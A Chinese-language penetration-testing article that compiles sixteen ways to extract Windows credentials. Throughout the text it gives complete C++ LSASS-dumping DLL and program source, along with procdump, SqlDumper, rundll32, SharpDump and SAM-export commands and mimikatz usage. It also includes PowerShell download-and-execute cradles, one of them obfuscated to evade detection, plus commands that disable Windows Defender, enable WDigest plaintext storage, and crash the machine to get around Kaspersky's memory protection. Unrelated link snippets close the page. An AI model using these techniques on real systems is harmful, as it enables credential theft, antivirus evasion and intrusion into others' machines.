導出windows密碼技巧大全

2021-03-02 滲透測試研究中心

一、使用RPC控制lsass加載SSP,實現DUMP LSASS繞過殺軟

1.已編譯好的ssp.dll(建議自己編譯)

spp.dll 需要修改為完整的絕對路徑,測試環境是win2012 管理員權限,提取的文件在C:\Windows\Temp\temp.bin,在windows 10 可能需要system權限。

編譯成功的spp.dll文件以及loader注入器:

https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/loader.zip

loader.exe  ssp.dll

mimikatz # sekurlsa::minidump teamp.bin 

mimikatz # sekurlsa::logonPasswords full

2.編譯以及注意點

(1).所編譯的.h 文件是 x64,不能用x86進行編譯;生成.h文件直接寫一個idl文件就可以生成,至於為什麼要用x64的編譯是因為xpn師傅當時只分析了x64的ssp註冊流程,寫的也是x64的流程,而且x86的註冊api也是不一樣的, x86並沒有NdrClientCall3這個函數,win10用的是NdrClientCall4封裝的NdrClientCall2,win7直接用的NdrClientCall2,要兼容x86你需要按照xpn師傅的文章重新分析然後重寫註冊流程。

(2).使用vs 2015,靜態庫中使用MFC進行編譯

(3).注意編譯的路徑和文件名以及lass.exe的進程ID值

(4).編譯 的ssp.dll代碼:

https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0

// dllmain.cpp : 定義 DLL 應用程式的入口點。

#include "pch.h"

#include <stdio.h>

#include <windows.h>

#include <DbgHelp.h>

#include <TlHelp32.h>

#pragma comment(lib,"Dbghelp.lib")

typedef HRESULT(WINAPI* _RtlAdjustPrivilege)(

    ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);

typedef HRESULT(WINAPI* _MiniDumpW)(

    DWORD arg1, DWORD arg2, PWCHAR cmdline);

int GetPid()

{

    PROCESSENTRY32 pe32;

    pe32.dwSize = sizeof(pe32);

    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hProcessSnap == INVALID_HANDLE_VALUE) {

        printf("CreateToolhelp32Snapshot Error!");

        return false;

    }

    BOOL bResult = Process32First(hProcessSnap, &pe32);

    while (bResult)

    {

        if (_stricmp(pe32.szExeFile, "lsass.exe") == 0)

        {

            return pe32.th32ProcessID;

        }

        bResult = Process32Next(hProcessSnap, &pe32);

    }

    CloseHandle(hProcessSnap);

    return -1;

}

int Dump_Lsass() {

    HRESULT hr;

    _MiniDumpW MiniDumpW;

    _RtlAdjustPrivilege RtlAdjustPrivilege;

    ULONG t;

    MiniDumpW = (_MiniDumpW)GetProcAddress(

        LoadLibrary("comsvcs.dll"), "MiniDumpW");

    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(

        GetModuleHandle("ntdll"), "RtlAdjustPrivilege");

    if (MiniDumpW == NULL || RtlAdjustPrivilege == NULL)

    {

        return 0;

    }

    RtlAdjustPrivilege(20, TRUE, FALSE, &t);

    wchar_t ws[100];

    int pid = GetPid();

    if (pid != -1)

    {

        swprintf(ws, 100, L"%d %hs", pid, "c:\\users\\public\\1.Dmp full"); #需要注意這裡輸出的路徑和文件名,,以及pid進程值

    }

    else {

        return 0;

    }

    

    MiniDumpW(0, 0, ws);

    return 0;

}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

    switch (ul_reason_for_call) {

    case DLL_PROCESS_ATTACH:

        Dump_Lsass();

        break;

    case DLL_THREAD_ATTACH:

    case DLL_THREAD_DETACH:

    case DLL_PROCESS_DETACH:

        break;

    }

    return TRUE;

}

或者

#include <cstdio>

#include <windows.h>

#include <DbgHelp.h>

#include <iostream>

#include <TlHelp32.h>

#pragma comment(lib,"Dbghelp.lib")

typedef HRESULT(WINAPI* _MiniDumpW)(

    DWORD arg1, DWORD arg2, PWCHAR cmdline);

typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(

    ULONG Privilege, BOOL Enable,

    BOOL CurrentThread, PULONG Enabled);

int dump() {

    HRESULT hr;

    _MiniDumpW MiniDumpW;

    _RtlAdjustPrivilege RtlAdjustPrivilege;

    ULONG t;

    MiniDumpW = (_MiniDumpW)GetProcAddress(

        LoadLibrary(L"comsvcs.dll"), "MiniDumpW");

    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(

        GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");

    if (MiniDumpW == NULL) {

        return 0;

    }

    // try enable debug privilege

    RtlAdjustPrivilege(20, TRUE, FALSE, &t);

    wchar_t ws[100];

    swprintf(ws, 100, L"%hs", "784 c:\\1.bin full"); //784是lsass進程的pid號 "<pid> <dump.bin> full" 

    MiniDumpW(0, 0, ws);

 return 0;

}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

 switch (ul_reason_for_call) {

 case DLL_PROCESS_ATTACH:

  dump();

  break;

 case DLL_THREAD_ATTACH:

 case DLL_THREAD_DETACH:

 case DLL_PROCESS_DETACH:

  break;

 }

 return TRUE;

}

寫了DUMP LSASS的DLL:

inject_lass_dump.exe dump_dll.dll

Project6.exe

3.參考連結

XPN的分析:https://blog.xpnsec.com/exploring-mimikatz-part-2/
三好學生的分析:的分析https://3gstudent.github.io/3gstudent.github.io/Mimikatz%E4%B8%ADSSP%E7%9A%84%E4%BD%BF%E7%94%A8/

奇安信編譯讓殺軟:

https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/

4.總結

該方法需要自己編譯,需要知道目標系統的lass.exe進程的ID值,以及設置輸出的路徑,編譯有點麻煩,可以繞過大多數殺軟,如繞過卡巴斯基

二、使用Masterkey工具獲取密碼(windows10和win7下測試成功)

1. 查看目標遠程憑據(如果有文件就相當於有憑據):

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

#如果此文件下沒有發現評級,可使用cmdkey /list 命令後一般出現了憑據信息,如果還是沒出現文件,說明文件是隱藏的,可以把隱藏系統文件勾選取消了或者使用命令dir /a進行查看。

#dir /a C:\Users\每個用戶\AppData\Local\Microsoft\Credentials\   //會把所有登錄的用戶的憑據加密文件都找出來

2. 將此文件夾中的文件從目標機遠程下載到本地的C:\a文件夾中

3. 在目標機上使用procdump獲取目標lsass.exe內存

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

4. 將lsass.dmp複製到本地,選擇一個剛剛下載下來的密碼文件對其進行解密。此處需要記錄下guidMasterKey的值。

mimikatz # dpapi::cred /in:C:\a\DACFAEA5B624B4361794A2CC8AED1460


5. 本地使用命令加載dmp並獲取guidMasterKey:

mimikatz# sekurlsa::minidump lsass.dmp //將lsaa.dmp導入mimikatz# sekurlsa::dpapi

6.複製此Masterkey,並執行命令解密:

mimikatz # dpapi::cred /in:C:\a\DACFAEA5B624B4361794A2CC8AED1460 /masterkey:6e65bc98836fcd5cd41c2d28ec96e538804c8b4d0419569b54a1be526f998192b1791ee40d995e6b4a9b3f126

7.解密成功,獲取到目標遠程連接的帳號與密碼:

8.總結:

(1).方法只需要管理員權限,而非system權限,可導出guidMasterKe文件

(2).需要結合微軟自帶的工具procdump導出lasss.exe

(3).然後將其guidMasterKe文件和lass.exe文件下載到本地通過mimiktaz進行讀取解密,是繞過殺軟獲取明文的方法。

三、procdump獲取密碼

1.powershell版的procdump

下載地址:https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1

(1).獲得lsass.exe的進程ID
tasklist /svc |findstr lsass.exe
(2).本地dump lsass.exe進程的內存文件

powershell -exec bypass "import-module .\Get-ProcessMiniDump.ps1;Get-ProcessMiniDump -ProcID 660 -Path C:\windows\tasks\lsass.dmp"

(3)遠程 dump lsass.exe進程的內存文件

powershell.exe IEX (New-Object Net.WebClient).DownloadString('

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1

');Get-ProcessMiniDump -ProcID 660 -Path C:\windows\tasks\lsass.dmp"


(4).mimikatz獲取本地密碼
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz#  sekurlsa::logonPasswords full

2.微軟自帶的工具ProcDump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

(1).Procdump.exe -accepteula -ma lsass.exe lsass.dmp

(2).把lsass.dmp下載到本地,放在同樣的系統(目標是windows2008-->本地也用Windows2008)
(3).mimikatz加載lsass.dmp
sekurlsa::minidump lsass.dmp
(4).抓取密碼
sekurlsa::logonPasswords full

3.一建命令

dump_passwd.bat

@echo off

color 0a

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit" > p6sw4d.txt

4.總結

(1).Get-ProcessMiniDump.ps1和procdump相比,優點在於Get-ProcessMiniDump.ps1可以使用IEX方式遠程下載執行,從而達到不落地的目的;

(2).當然procdump為微軟自己的工具免殺應該會好一些,在有卡巴斯基的機器上執行powershell是會被攔截的。

四、SqlDumper.exe 獲取密碼

1.如果目標系統上安裝了windows sql server ,SqlDumper.exe默認存放在c:\Program Files\Microsoft SQL Server\number\Shared,其中number代表sql server的版本
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005
我本地安裝的是Windows sql server 2016 所以我的SqlDumper.exe在這個位置C:\Program Files\Microsoft SQL Server\130\Shared\ 
 - 
2.如果目標沒有安裝Windows sql server ,可以自己上傳一個SqlDumper.exe和procdump.exe一樣,都是微軟自己的,不會存在被AV殺掉的可能,除非安裝的殺毒軟體有dump內存文件保護: 
3.SqlDumper.exe的大小遠小於procdump.exe、procdump64.exe
 
4.使用方法: 
(1).查看lsass.exe 的ProcessID
tasklist /svc |findstr lsass.exe


(2).根據ProcessID來dump 內存文件,Full dump file執行成功後會生產SQLDmpr0001.mdmp文件

Sqldumper.exe ProcessID 0 0x01100

5.mimikatz加載dump文件
sekurlsa::minidump SQLDmpr0001.mdmpsekurlsa::logonPasswords full 

6.批處理命令執行

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do Sqldumper.exe %i 0 0x01100

sqldumper.exe  1036  0   0x01100

7.總結:

(1).sql2012版依賴msvcr100.dll,sql2016版依賴msvcr120.dll

(2).SqlDumper.exe體積大小於procdump.exe、procdump64.exe,命令行操作,微軟自己東西,免殺。

(3).針對內存保護的殺軟是無法導出的,如卡巴斯基,NOD32

五、mimikatz工具獲取密碼

1.自身命令獲取密碼

https://github.com/gentilkiwi/mimikatz/releases

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" #在命令窗口中顯示

mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" > p6sw4d.txt  #導出到一個記事本文件中顯示

2.powershell版本的mimikatz

https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

(1).本地執行

C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"

(2).遠程加載

powershell.exe IEX (New-Object Net.WebClient).DownloadString('

https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

');Invoke-Mimikatz

或者

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

(3).Invoke-Mimikatz簡單混淆就bypass

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

3.windwos10以及以上抓取明文:

(1).臨時禁止Windows Defender
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force  #鍵值為1時Wdigest Auth保存明文口令,為0則不保存明文

(2).修改註冊表開啟UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(3).等用戶下次再登錄的時候,可抓到明文密碼
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

4.powershell 免殺抓明文 :

powershell "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp"

只需把 dmp 文件拖到本機機器再用 mimikatz.exe 加載 lsass_504.dmp 文件讀取即可
# mimikatz.exe "sekurlsa::minidump lsass_504.dmp" "sekurlsa::logonPasswords full" exit

5.總結

(1).可以直接抓取win7以下的系統明文密碼,不免殺,需要自己修改,對代碼進行修改,重新編譯免殺mimikatz

(2).win 8,8.1,2012,10,16修改改註冊表下次系統登錄可抓取明文密碼

六、QuarksPwDump導出密碼

https://github.com/quarkslab/quarkspwdump

QuarksPwDump.exe -dhl

總結:該工具不免殺,容易被殺

七、wce導出密碼

https://www.ampliasecurity.com/research/wcefaq.html

wce.exe -w

總結:該工具只能用於windows2003.winxp系統中

八、pwdump7導出密碼

http://www.tarasco.org/security/pwdump_7/index.html

PwDump7.exe

總結:該工具不免殺

九、LaZagne導出密碼

https://github.com/AlessandroZ/LaZagne

laZagne_x86.exe windows

總結:該工具不免殺

十、任務管理器內存dump

1.通過以下操作可先獲取到lsass內存文件,然後使用mimikatz可進一步讀取密碼

2.可發現成功的創建了一個dmp文件,把它拷貝到本地,然後使用mimikatz恢復獲取明文

mimikatz.exe "sekurlsa::minidump c:\lsass.dmp""sekurlsa::logonPasswords full" "exit" >pass64.txt

十一 .c#版本的mimikatz工具SharpDump

https://github.com/GhostPack/SharpDump

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do SharpDump.exe %i

sharpdump.exe   lass.exe進程ID

體積小[也就 9k 左右],免殺[實測 nod32 沒啥問題]暫時還可以,默認它會自動 dump lsass.exe 進程數據,當然,你也可以指定進程 id 來 dump,在一些斷網環境下很實用,如
下,先在目標機器上把 lsass.exe 進程數據導出來 

之後,依然是回到本機機器用 mimikatz.exe 讀取剛剛 dump 出的文件,特別注意,dump 的文件默認是 bin 後綴,拖到本地機器以後,需要自行把 bin 重命名為 zip 的後綴,然後正常解壓處裡面的文件,再丟給 mimikatz 去讀取即可,如下
# mimikatz.exe "sekurlsa::minidump debug504" "sekurlsa::logonPasswords full" "exit" 

十二、rundll32獲取密碼

1.批處理命令執行

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %i .\lsass.dmp full

rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump 856 .\lass.dmp full

2.powershell版本執行

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 460 C:\lsass.dmp full" (460是lsass.exe的進程,因系統不同,所以部分機器的pid值不同,利用comsvcs.dll 文件中的MiniDump 函數來Dump)

mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonpasswords full" "exit" > fb.txt

十三、SAM資料庫導出獲取密碼

1.管理員執行:

reg save hklm\sam .\sam.hive&reg save hklm\system .\system.hive

2.將兩個文件拷貝到本地,然後導入SAMInside並將NT-Hash複製出來去相關網站查詢即可(mimikatz也可以讀)

十四、通過Windows藍屏文件來繞過kaspersky的內存保護抓密碼

卡巴以及小紅傘均對lsass.exe進行了保護,導致微軟出的兩款工具以及他自己的kldumper都無法用於dump lsass。但是可以通過製造藍屏來獲取所有內存的文件MEMORY.DMP沒然後在提出lsass進一步讀取。

需要的工具:WinDBG+mimilib.dll

測試環境一:win8.1
kaspersky2019(病毒庫為2018.10.25號的)

1.首先我用procdump來dump lsass.exe的內存文件

2.再用我在https://www.t00ls.net/thread-47663-1-1.html中分享的用sqldump來dump,結局都一樣,因為sqldump和procdump的原理都一樣

3.下面我們就用Windows藍屏memory.dmp文件來測試
獲取藍屏後的dmp文件,使系統藍屏的方法有很多,比如說強制結束系統進程,我這裡選擇強制結束系統進程wininit.exe
管理員權限運行cmd後,執行taskkill /f /im "wininit.exe"

4.取回存在於C:\Windows\文件夾下面的MEMORY.DMP文件

5.運行windbg,使用Open the crashdump加載MEMORY.DMP

6.加載mimikatz的mimilib.dll
.load C:\Users\Administrator\Desktop\qqq\mimilib.dll注意load 前面那個點別漏掉

7.設置微軟符號伺服器(這一步在測試中可有可無)
.SymFix
8.重新加載
.Reload
9.查看lsass.exe進程的內存地址
!process 0 0 lsass.exe
10.切換到lsass.exe進程中
.process /r /p fffffa800e069b00

11.運行mimikatz
!mimikatz

12.總結:

缺點:
(1).使用這種方法抓密碼,需要機器重啟一次,藍屏一次,而且第一次重啟之後你想要的user得重新登陸後才行
(2).memory.dmp文件會很大
優點:
(1).繞過kaspersky對內存的保護

十五、利用windows api dump進程

使用PssCaptureSnapshot的好處是,當獲取明文時調用MiniDumpWriteDump時,它不會直接讀取lsass進程內存,而是從進程的快照中讀取。在MiniDumpWriteDump調用中使用由PssCaptureSnapshot返回的句柄,而不是LSASS進程句柄

代碼如下:

#include "stdafx.h"

#include <windows.h>

#include <DbgHelp.h>

#include <iostream>

#include <TlHelp32.h>

#include <processsnapshot.h>

#pragma comment (lib, "Dbghelp.lib")

using namespace std;

BOOL CALLBACK MyMiniDumpWriteDumpCallback(

__in PVOID CallbackParam,

__in const PMINIDUMP_CALLBACK_INPUT CallbackInput,

__inout PMINIDUMP_CALLBACK_OUTPUT CallbackOutput

)

{

switch (CallbackInput->CallbackType)

{

case 16: // IsProcessSnapshotCallback

CallbackOutput->Status = S_FALSE;

break;

}

return TRUE;

}

int main() {

DWORD lsassPID = 0;

HANDLE lsassHandle = NULL;

HANDLE outFile = CreateFile(L"c:\\temp\\lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

PROCESSENTRY32 processEntry = {};

processEntry.dwSize = sizeof(PROCESSENTRY32);

LPCWSTR processName = L"";

if (Process32First(snapshot, &processEntry)) {

while (_wcsicmp(processName, L"lsass.exe") != 0) {

Process32Next(snapshot, &processEntry);

processName = processEntry.szExeFile;

lsassPID = processEntry.th32ProcessID;

}

wcout << "[+] Got lsass.exe PID: " << lsassPID << endl;

}

lsassHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);

HANDLE snapshotHandle = NULL;

DWORD flags = (DWORD)PSS_CAPTURE_VA_CLONE | PSS_CAPTURE_HANDLES | PSS_CAPTURE_HANDLE_NAME_INFORMATION | PSS_CAPTURE_HANDLE_BASIC_INFORMATION | PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION | PSS_CAPTURE_HANDLE_TRACE | PSS_CAPTURE_THREADS | PSS_CAPTURE_THREAD_CONTEXT | PSS_CAPTURE_THREAD_CONTEXT_EXTENDED | PSS_CREATE_BREAKAWAY | PSS_CREATE_BREAKAWAY_OPTIONAL | PSS_CREATE_USE_VM_ALLOCATIONS | PSS_CREATE_RELEASE_SECTION;

MINIDUMP_CALLBACK_INFORMATION CallbackInfo;

ZeroMemory(&CallbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));

CallbackInfo.CallbackRoutine = &MyMiniDumpWriteDumpCallback;

CallbackInfo.CallbackParam = NULL;

PssCaptureSnapshot(lsassHandle, (PSS_CAPTURE_FLAGS)flags, CONTEXT_ALL, (HPSS*)&snapshotHandle);

BOOL isDumped = MiniDumpWriteDump(snapshotHandle, lsassPID, outFile, MiniDumpWithFullMemory, NULL, NULL, &CallbackInfo);

if (isDumped) {

cout << "[+] lsass dumped successfully!" << endl;

}

PssFreeSnapshot(GetCurrentProcess(), (HPSS)snapshotHandle);

return 0;

}

十六、獲取本地密碼工具

https://github.com/TheKingOfDuck/hashdump

https://github.com/outflanknl/Dumpert

相關焦點

  • CF穿越火線鷓鴣哨密室收藏密碼答案大全 跟大家分享一下技巧
    CF穿越火線鷓鴣哨密室收藏密碼答案大全 跟大家分享一下技巧時間:2020-12-03 11:45   來源:逗遊網   責任編輯:凌君 川北在線核心提示:原標題:CF穿越火線鷓鴣哨密室收藏密碼答案大全 跟大家分享一下技巧 CF穿越火線遊戲中最近開啟了一個鷓鴣哨密室收藏活動,但是很多玩家不知道密碼答案是什麼,所以接下來小編就跟大家分享一下技巧吧
  • iPhone已登錄的WiFi密碼怎麼查看?不用越獄,一鍵查看/導出!
    我們知道在WiFi界面是無法查看已連接WiFi的密碼,如何快速、高效查看/導出WiFi密碼,或直接複製粘貼WiFi密碼,不妨試試這2個方法!方法一可直接查看密碼,還可一鍵導出保存!方法一:使用牛學長工具,一鍵查看/導出WiFi密碼牛學長蘋果手機密碼管理工具,不僅可以查看已連接的WiFi密碼,還可查看已登錄的網頁、APP(淘寶、京東等)、郵箱和iPhone屏幕使用時間密碼等,而且可以按照自己的需要選擇查看或導出密碼。
  • 如何設置windows的密碼複雜度?
    當我們安裝好windows作業系統之後就發現電腦是必須要設置密碼的;這不是重點;重點是密碼長度有要求;而且密碼複雜度也有要求;必須英文大小寫+數字組合;這其實非常的麻煩啦;所以我們這次要來關閉密碼的複雜度以及密碼長度;請自行安裝好windows作業系統從開始菜單選擇控制面板
  • 滲透技巧——使用Mimilib從dump文件中導出口令
    更多參考資料:https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/user-mode-dump-files創建方法:可以使用Procdump進行創建。
  • Revit文件導出格式大全(下)
    上次和大家講到了文件導出格式大全(上),期待已久的Revit文件導出格式大全(下)來啦,幫助你掌握Revit導出格式的相關知識~如果正在導出多個視圖和圖紙,所有相關導出操作將被取消。Revit 將創建網頁。從網頁中,可以打開目錄中的視圖。視圖標記為超連結。例如,假設導出「標高 1」視圖和「北立面」視圖。
  • windows運行命令大全,你用過幾個?
    windows有很多隱藏的功能,我們可以通過運行命令快速把他們調出來,比如我們常用的cmd、計算器、軟鍵盤等等。今天蟈蟈就來給大家例舉一下windows運行命令大全,希望對您所有幫助!如何運行命令?方法二、使用快捷鍵 win + r,即可彈出運行彈窗以下是命令大全,常用的已經紅色標註!!!
  • 電腦小技巧--查看wifi密碼
    」電腦小技巧--修復U盤容量為0電腦小技巧--關閉windows自動更新電腦小技巧--U盤格式化防寫今日有網友諮詢小編,「如何查看電腦wifi密碼?」,今天就給大家介紹下如何查看wifi密碼。首先必須得保證手機或電腦連上了WiFi,不管是別人給你輸的,亦或者是你用WiFi萬能鑰匙等類似軟體破開的等等,總而言之就是你連上了WiFi,卻不知道WiFi密碼,可以考慮這些方法方法一:手機端查看wifi密碼1、在「WLAN設置」內,點擊已經連接的wifi熱點
  • 忘記自家WiFi密碼了怎麼辦?通過Windows可找回密碼
    WiFi一般只用在最初連接時輸入一次密碼後,下次連接就再也不用自己手動輸入密碼。這雖然很方便,但是保不準我們在日常生活中需要有重新輸入密碼的時刻,不過因為長期不輸入密碼,我們很可能會忘記自家的WiFi密碼。如果這種情況真的發生了該怎麼辦?近日,微軟官方教了我們一招用Windows查找WiFi密碼的辦法,我們一起來看看。
  • 王者榮耀土豪帳號密碼大全2020 v8帳號密碼免費領取
    這裡就為大家送上王者榮耀v8土豪帳號密碼大全2020,快來分享吧。王者榮耀v8號 土豪帳號密碼大全20204102624386344276893053175919741170030550288376009160832672388833215096918150054141575664148239922786相之對於密碼:oF3E8woSj0S55ONckDfEngbQbqXcbD9ImynIp5hEEWlCvRvt
  • 微信導出通訊錄:微信好友導出excel詳細教程
    微信導出通訊錄:微信好友導出excel詳細教程。微信是目前社會中最流行的社交工具了,不僅如此,我們的衣食住行、以及與好友間的語音視頻聊天都在微信,可隨著微信通訊錄裡的好友增加,我們在清理微信好友時也經常會誤刪!這個好友恢復方法很實用,趕緊收藏。
  • 滲透技巧——Windows下NTFS文件的USN Journal
    在上篇文章《滲透技巧——Windows下NTFS文件的時間屬性》介紹了修改NTFS文件時間屬性的方法和細節,以及取證上的建議。 本文將要繼續研究NTFS文件另一處記錄文件修改時間的位置——USN Journal,同樣是分析利用思路,給出取證上的建議。
  • 電腦密碼忘記了怎麼辦?開機密碼忘記怎麼辦?
    由於網絡安全的知識普及,很多人為了電腦數據的安全或者出於保護自己隱私的原因,對自己的電腦設置的開機密碼,但是有時時間久了,電腦密碼忘記了怎麼辦,也許在我們急需用電腦之際,卻很苦惱自己為什麼記不起自己定下的密碼,這時候必須冷靜下來,想想自己平常設置密碼的數字,一系列的事情,或者想下有什麼密碼提示
  • iPhone導出通訊錄小技巧【2】
    原標題:App今日免費:iPhone導出通訊錄小技巧     App今日免費:iPhone導出通訊錄小技巧   Excel通訊錄會將我們iPhone中所有聯繫人信息連同照片打包到一個Zip文件中,並通過Email、USB或僅能在本地區域網中訪問的網頁等方式導出到你的電腦中
  • 新版Microsoft Edge 將帶來垂直標籤和密碼監視器
    密碼監視器密碼監視器可幫助用戶了解自己的密碼是否在暗網中被洩露。在瀏覽器中將密碼保存為自動填充的憑據後,如果瀏覽器監測到任何與用戶名+密碼相匹配的內容,將發送通知給用戶。智能複製(smart copy)可選中網頁任何區域進行智能複製,該功能將保留所有原始格式,包括所有圖表、連結等的排版。
  • 《騎馬與砍殺:無雙三國》導入導出法 秘籍大全
    導 讀 《騎馬與砍殺:無雙三國》遊戲中想要輕鬆遊戲的玩家們,今天小編就為大家帶來了《騎馬與砍殺:無雙三國》秘籍大全,一起來看看吧。
  • 《迷你世界》先遣服帳號密碼大全匯總 免費帳號密碼發放
    近期很多玩家已經躍躍欲試想要快人一步體驗新版樂趣,於是求迷你世界先遣服帳號及密碼的聲音絡繹不絕。今天為大家帶來的是迷你世界先遣服帳號大全,喜歡的玩家趕快領取登錄啦! 迷你世界先遣服帳號大全: 帳號:320160 密碼:qwe123 帳號:226250 密碼:yUq7BW 帳號:226258 密碼:uuf2vi
  • 《女神異聞錄5》銀行迷宮密碼大全
    一些玩家可能忘了銀行迷宮的四個密碼,銀行也就是金庫的迷宮流程比較長,很多玩家都不小心忘記了密碼,下面小編就為大家帶來了女神異聞錄5銀行迷宮密碼大全,忘記的小夥伴一起來看... 《女神異聞錄5》銀行迷宮怎麼過?
  • 密碼管理器極密盾K2: 再也不怕丟密碼
    實際上,使用密碼管理器就可以很大程度上保障帳號密碼的安全,還能防患於未然。一般大家常用的密碼管理器都是軟體,例如1password、lastpass、dashlane等。現在,我們有了新選擇,一個硬體版的密碼管理器:極密盾K2。極密盾K2是一款管理帳號密碼的智能設備。和那些密碼管理軟體相比,二者功能上大致相同,但在安全性上,不可同日而語。
  • 《生死狙擊》好號密碼2019大全 可登陸的好號密碼分享
    導 讀 《生死狙擊》好號密碼大全,最新好號密碼分享沒人玩。生死狙擊的好號和密碼想不想知道呢?
  • 滲透技巧——通過CredSSP導出用戶的明文口令
    我在之前的文章《Windows下的密碼hash——Net-NTLMv1介紹》曾介紹過使用InternalMonologue獲得當前用戶憑據的方法(通過SSPI調用對NTLM身份驗證包(MSV1_0)的本地過程調用,以計算出NetNTLM響應),不需要對lsass進程操作。